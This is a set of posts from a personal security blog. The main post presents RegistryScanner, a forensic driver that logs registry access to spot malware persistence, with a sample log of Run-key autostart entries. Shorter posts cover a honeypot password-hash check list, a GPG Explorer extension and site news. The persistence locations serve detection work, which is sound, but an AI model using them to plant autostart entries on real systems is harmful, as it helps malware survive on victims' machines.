With RegistryScanner you can monitor access to the registry on forensics machines. The driver logs new created processes, so you can easily link the process id to the registry event that occurred. All events will be logged to an text file in Unicode format. The delimiter character is #, so it should be no problem to process a given log with one of the well known scripting languages (e.g. python or ruby). By using a well defined rules set, you can filter out suspicious actions and thus are able to quickly rate given files as probably suspicious. For example you could set up a VM and start up suspicious executables, then use RegistryScanner’s log to check typical autostart locations in the registry etc. You can do the same with well document formats (Word, Excel, PowerPoint, PDF, ...) If you open up an suspicious file, and RegistryScanner’s log file states that a well known autostart location (e.g. Run, DllAttach, Debugger, Service) was altered, it is very likely that your forensics machine was hit by an exploit trying to get persistent. Depending on the rules you have specified, you can quickly rate a given analysis stage without doing deep reverse engineering.

An example log is given here. I have started up regedit.exe, created some keys, renamed and edited them. The first value indicates the process id (PID). On process creation the second value indicates the parent's process id.

8E0 # 954 # \??\C:\Windows\regedit.exe # "C:\Windows\regedit.exe"
8E0 # RegNtPostOpenKeyEx # \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows\safer\codeidentifiers
8E0 # RegNtQueryValueKey # \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows\safer\codeidentifiers\TransparentEnabled
8E0 # RegNtKeyHandleClose # \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows\safer\codeidentifiers
8E0 # RegNtQueryValueKey # \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Neuer Wert #1
8E0 # RegNtQueryValueKey # \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Neuer Wert #1
8E0 # RegNtQueryValueKey # \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\EvilExploit
8E0 # RegNtPreSetValueKey # \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\ EvilExploit # REG_SZ # 0000
...
8E0 # RegNtQueryValueKey # \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\ EvilExploit
8E0 # RegNtPreSetValueKey # \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\ EvilExploit # REG_SZ # 43003A005C00550073006500720073005C006A006F00650044006F0065005C0041007000700044006100740061005C004C006F00630061006C005C00540065006D0070005C006D006D006100700055007000640061007400650072002E006500780065000000
...
8E0 # RegNtPreSetValueKey # \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Bang # REG_DWORD_REG_DWORD_LITTLE_ENDIAN # 00000000
...
8E0 # RegNtQueryValueKey # \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Neuer Wert #1
8E0 # RegNtQueryValueKey # \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\bitnuts
8E0 # RegNtPreSetValueKey # \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\bitnuts # REG_SZ # 0000
...
8E0 # RegNtPostOpenKeyEx # \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Neuer Schlüssel #1
8E0 # RegNtQueryKey # \REGISTRY\MACHINE
8E0 # RegNtRenameKey # \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Neuer Schlüssel #1 -> Farid
8E0 # RegNtKeyHandleClose # \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Farid
...
8E0 # RegNtQueryKey # \REGISTRY\MACHINE
8E0 # RegNtPostOpenKeyEx # \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Farid
8E0 # RegNtPreDeleteKey # \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Farid
...
8E0 # exiting

The driver is still under development, so if you have any questions or comments do not hesitate and contact me. Any feedback is appreciated. I am also interested in the rule sets you guys are using (or you would use to track malware). If you can share I would be happy and provide the information here for other researchers, so everybody benefits.

The driver is and will be free for non-commercial usage. If you use it in your own research projects let me know, so we may exchange knowledge and rules.

You can download the latest package here registryscanner.zip. Enjoy!


Why reinventing the wheel isn't always wrong

2015/03/30 by Flo

I stumpled across this article by evilsocket and fully agree with him.

I often heard from people: this and that is already implemented, why do you waste any time and program your own tool, driver or what ever. They also complain that my solutions are not as perfect as solutions from other (OSS) projects etc... blah, blah...

Well, you might be right, but let me answer you crack-headed, genious egg heads:

" ... do not tell me that during your CS courses you've implemented everything, tried everything and came accross every problem you could find while developing because this is bullshit ... "

I still like to understand how things work internally and behind the scenes. I hate sophisticated, heavy weighted solutions that consume megabytes of space just to solve a tiny problem. I really like hacking and programming and even if one of my solutions is not perfect, I have always learned a lot and have experience that helps me to quickly understand complex IT problems today and in my daily job. I often see average large blab academic dudes failing if it goes into the dirty details and if we leave the well crafted roads - there using libraries from the rod is often no smart idea, because you really need deep knowledge.

Well, here is my suggestion for you: You shall start implementing the stuff, not just using big scale libraries from Java, PHP and Python or copy and paste by googling around. And by the way: keep your good advices, if you aren't a true hacker. I am sick of you smart asses talking about things you've never ever made your hands dirty with!


A huge list of commonly used passwords

2015/03/15 by Flo

I have posted on these brute forcing bots out there, trying to gain access to typical CMS and forum software by trying huge lists of passwords on typical user names. Since 2014 I have set up some honeypots that are collecting such access attempts to well known fake CMS and Blog systems.

I have now merged a list of about 500MBs passwords I have collected so far. This was a research project to test, how many passwords could be collected and about the pass phrases used by these bots. To provide you some benefit out of this project I have build a shrinked down version of these passwords that may help you in finding weak passwords at your site. I have just calculated the sha-512 hash value out of each password, converted the hash value to base64 and extracted the first 5 characters out of the string. Please note: This reduces the overall size and maps several passwords to the same shrinked version.

Why did you do that? Well, regarding German laws and legal codes I am not allowed to publish password lists. It is also not recommended to share hash lists. Using shrinked hash lists does not disclose any valuable information for the bad guys but enables you to check your passwords against this list. If you build the base64 sha-512 hash value of your password(s) and extract the first characters out of the result you can still check it against my list and can see, if you find an hit. If yes, it is more likely that your password is already in a list such bots are using. If you want clear evidence you can contact me.

You can download the list here: shrinked_pwd_hashes.7z


Integrate GPG into your Windows Explorer’s Shell

2015/03/05 by Flo

I like small and tiny installations without the bloat of help files, shiny user interfaces, tray icons, all day running background tasks etc. That's why I implemented the "quick and dirty" GPG4Win Shell integration.

Summarized: This is a shell-extension to integrate GPG encryption into Microsoft Windows Explorer without installing all the bloat GPG4Win usually ships.

How to install:

Extract the content of the file gpg2winshell.zip. Open up a command prompt (cmd.exe) as administrator. Go to the extracted folder and start the install.cmd script.

If everything works out fine you are now able to en- and decrypt files and folders with GPG4Win by using the Windows context menu (right click on a folder or file). Just select one of the above. A command shell will open up showing some status information and asking you for the recipient’s gpg ID to encrypt or asks for your password to decrypt.

This is it, now have fun encrypting your files with GPG.


Some initial words for 2015

2015/02/08 by Flo

Well, after a lot of work in December and January I am back. Since I have founded Excubits my private Blog was a bit neglected, but I am back again and will post on my blog. The password hash checker is already pipelined and will hopefully released during February, so you can check if your password is already on the lists, these brute-forcing bots are using to log into well known CMS. Having several honeypots set up, I now have a huge collection of passwords. Thanks to all the script kiddies out there, who were heavily penetrating my honeypots in the last few weeks ☺.

Regarding my drivers I have to announce that they will be removed from the Blog. The descriptions and whitepapers will still remain, but all demo versions will just contain a text file linking to Excubits now. So, all related binaries and support will be done through Excubits from now on. If you are interested in Türsteher (Bouncer), MZWriteScanner and ExecutableCheckers, you shall visit my company's web page for demo versions and additional information. You should register for our newsletter, so you will never miss any news. By the way, we are testing Türsteher Plus right now and will start private beta phase soon. Türsteher (Bouncer) Plus will support SHA-2 hash based signatures on executables and will enhance security even better.

Regarding all the other stuff, everything remains as before. The main structure of the Blog remains, there was just a little face lifting as you may have noticed.

Back in the days I featured a blog post on how to easily include Brainpool Curves into OpenSSL (see the archives). I also Big Integers, Public Key Cryptography and especially the ellegance of Elliptic Curve Cryptography, so it is no wonder that I also love TweetNaCl. Hence I am now using JavaScript TweetNaCl for all comments sent through my contact form. But I am also able to receive TweetNaCl-encrypted files. If you like to contact me using TweetNaCl crypto, feel free and make use of my public key:

xor7vij7rFaYBHBJQTzGMZ5xk6oYfRJoSAOw25+DTlc=

There will be more at bitnuts.de in 2015:

I feel now comfortable enough to announce T!NKle CMS -- my home brew Content Management System that will be featured here soon. It is a true file-based NO-SQL and easy to use CMS for everyone. If you are a web designer you gonna love T!NKle. It is easy to setup, easy to use and fast as hell. Just design your web page in HTML5/CSS, include three or four lines of additional macros into your template and this is it. T!NKle is already in use by third-parties (e.g. http://otc-bonn.de) and early-bird web designers, they all love its awesome simplicity and instant architecture. You gonna it, too! So stay tuned and watch out for T!NKle.